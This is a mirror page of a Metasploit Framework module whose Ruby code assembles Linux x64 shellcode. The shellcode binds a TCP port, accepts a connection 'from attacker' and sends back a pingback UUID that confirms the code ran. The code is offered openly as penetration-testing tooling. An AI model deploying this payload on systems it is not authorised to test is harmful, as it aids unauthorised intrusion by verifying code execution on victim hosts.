Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 109
8
9
include Msf::Payload::Linux::X64::Prepends
10
include Msf::Payload::Single
11
include Msf::Payload::Pingback
12
include Msf::Payload::Pingback::Options
13
14
def initialize(info = {})
15
super(
16
merge_info(
17
info,
18
'Name' => 'Linux x64 Pingback, Bind TCP Inline',
19
'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
20
'Author' => [ 'bwatters-r7' ],
21
'License' => MSF_LICENSE,
22
'Platform' => 'linux',
23
'Arch' => ARCH_X64,
24
'Handler' => Msf::Handler::BindTcp,
25
'Session' => Msf::Sessions::Pingback
26
)
27
)
28
end
29
30
def generate(_opts = {})
31
# 22 -> "0x00,0x16"
32
# 4444 -> "0x11,0x5c"
33
encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
34
encoded_host = Rex::Socket.addr_aton('0.0.0.0').unpack('V').first
35
encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
36
self.pingback_uuid ||= generate_pingback_uuid
37
uuid_as_db = '0x' + pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')
38
39
asm = %^
40
push rsi
41
push rax
42
;SOCKET
43
push 0x29
44
pop rax
45
cdq
46
push 0x2
47
pop rdi
48
push 0x1
49
pop rsi
50
syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
51
test rax, rax
52
js failed
53
54
xchg rdi, rax
55
mov rcx, #{encoded_host_port}
56
push rcx
57
mov rsi, rsp
58
push rsp
59
pop rsi ; store pointer to struct
60
61
bind_call:
62
; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
63
; rdi -> fd already stored in rdi
64
; rsi -> pointer to sockaddr_in6 struct already in rsi
65
push 0x31
66
pop rax ; bind syscall
67
push 0x10 ; sockaddr length
68
pop rdx ;
69
syscall
70
71
listen_call:
72
; int listen(int sockfd, int backlog);
73
; rdi -> fd already stored in rdi
74
push 0x32
75
pop rax ; listen syscall
76
push 0x1
77
pop rsi ; backlog
78
syscall
79
80
accept_call:
81
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
82
; rdi -> fd already stored in rdi
83
push 0x2b
84
pop rax ; accept syscall
85
cdq ; zero-out rdx via sign-extension
86
push rdx
87
push rdx
88
push rsp
89
pop rsi ; when populated, client will be stored in rsi
90
push 0x1c
91
lea rdx, [rsp] ; pointer to length of rsi (16)
92
syscall
93
xchg rdi, rax ; grab client fd
94
send_pingback:
95
; sys_write(fd:rdi, buf*:rsi, length:rdx)
96
push #{uuid_as_db.split(',').length} ; length of the PINGBACK UUID
97
pop rdx ; length in rdx
98
call get_uuid_address ; put uuid buffer on the stack
99
db #{uuid_as_db} ; PINGBACK_UUID
100
get_uuid_address:
101
pop rsi ; UUID address into rsi
102
xor rax, rax ; sys_write = offset 1
103
inc rax ; sys_write = offset 1
104
syscall ; call sys_write
105
106
failed:
107
push 0x3c
108
pop rax
109
push 0x1
110
pop rdi
111
syscall ; exit(1)
112
^
113
Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
114
end
115
end
116
117